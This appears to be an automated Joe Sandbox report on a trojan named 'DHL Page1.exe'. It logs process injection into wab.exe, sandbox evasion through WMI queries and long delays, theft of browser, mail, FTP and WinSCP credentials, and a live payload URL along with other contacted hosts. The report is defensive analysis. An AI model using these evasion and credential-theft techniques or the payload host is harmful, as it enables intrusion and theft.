Source: C:\Users\user\Desktop\DHL Page1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL Page1.exe	API/Special instruction interceptor: Address: 847E230
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API/Special instruction interceptor: Address: 6C8E230

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 37770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 37680000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Window / User API: threadDelayed 800

Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\DHL Page1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll			Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6224	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3252	Thread sleep count: 800 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_00406577 FindFirstFileW,FindClose,	0_2_00406577
Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_0040287E FindFirstFileW,	0_2_0040287E
Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_00405A25 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405A25

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wab.exe, 00000004.00000002.127055355924.000000000271C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAWx

Source: C:\Users\user\Desktop\DHL Page1.exe	API call chain: ExitProcess graph end node			graph_0-4381
Source: C:\Users\user\Desktop\DHL Page1.exe	API call chain: ExitProcess graph end node			graph_0-4538

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,

0_2_00401E43

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL Page1.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000			Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 47FD28			Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe

Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\DHL Page1.exe"

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_00406256 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406256

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match

File source: 00000004.00000002.127076986570.00000000377C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	1 Credentials in Registry	126 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Process Injection	1 DLL Side-Loading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Masquerading	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL Page1.exe	100%	Avira	HEUR/AGEN.1331786
DHL Page1.exe	13%	ReversingLabs	Win32.Trojan.Generic
DHL Page1.exe	13%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org	0%	Virustotal		Browse
smtp.gmail.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org/	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr1/gsr1.crl0;	0%	Avira URL Cloud	safe
http://o.pki.goog/wr20%	0%	Avira URL Cloud	safe
http://i.pki.goog/r1.crt0	0%	Avira URL Cloud	safe
http://c.pki.goog/r/r1.crl0	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
http://pki.goog/gsr1/gsr1.crt02	0%	Avira URL Cloud	safe
http://i.pki.goog/r1.crt0	0%	Virustotal		Browse
http://crl.pki.goog/gsr1/gsr1.crl0;	0%	Virustotal		Browse
http://o.pki.goog/wr20%	0%	Virustotal		Browse
https://api.ipify.org/	0%	Virustotal		Browse
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://smtp.gmail.com	0%	Avira URL Cloud	safe
http://c.pki.goog/r/r1.crl0	0%	Virustotal		Browse
http://pki.goog/gsr1/gsr1.crt02	0%	Virustotal		Browse
http://i.pki.goog/wr2.crt0	0%	Avira URL Cloud	safe
http://c.pki.goog/wr2/75r4ZyA3vA0.crl0	0%	Avira URL Cloud	safe
http://peraarae.nl/ViaMYxizkt11.bin	0%	Avira URL Cloud	safe
http://smtp.gmail.com	0%	Virustotal		Browse
http://nsis.sf.net/NSIS_ErrorError	0%	Virustotal		Browse
http://c.pki.goog/wr2/75r4ZyA3vA0.crl0	0%	Virustotal		Browse
http://i.pki.goog/wr2.crt0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false	0%, Virustotal, Browse	unknown
smtp.gmail.com	172.253.62.108	true	false	0%, Virustotal, Browse	unknown
peraarae.nl	104.153.208.178	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://peraarae.nl/ViaMYxizkt11.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pki.goog/gsr1/gsr1.crl0;	wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://o.pki.goog/wr20%	wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://c.pki.goog/r/r1.crl0	wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://i.pki.goog/r1.crt0	wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/gsr1/gsr1.crt02	wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	DHL Page1.exe, 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Page1.exe, 00000000.00000000.121985944583.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://smtp.gmail.com	wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://i.pki.goog/wr2.crt0	wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://c.pki.goog/wr2/75r4ZyA3vA0.crl0	wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
172.253.62.108	smtp.gmail.com	United States	15169	GOOGLEUS	false
104.153.208.178	peraarae.nl	Reserved	32875	VIRPUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501086
Start date and time:	2024-08-29 12:20:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL Page1.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@3/12@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 104 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	fptlVDDPkS.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	zE7Ken4cFt.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.DropperX-gen.20063.4917.exe	Get hash	malicious	Stealc	Browse	api.ipify.org/
	Zoom_workspace.hta	Get hash	malicious	Cobalt Strike, Clipboard Hijacker	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	6OiUEubyA8.msi	Get hash	malicious	Quasar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe	Get hash	malicious	Conti, PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
104.153.208.178	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	rabtbts.nl/SaOUJJyWvcSxh69.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	172.67.74.152
	Great Wall Motor Sale Bank_Sift_Copy.Pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.13.205
	Programa de Mentoring y Apoyo a la Internacionalizaci#U00f3n.exe	Get hash	malicious	GuLoader	Browse	104.26.13.205
	5649237431_23-10-23-08.49.23.0107.07.exe	Get hash	malicious	GuLoader	Browse	104.26.12.205
	Hua San Particulars.doc.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	BULK HARVEST - VESSEL PARTICULARS.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
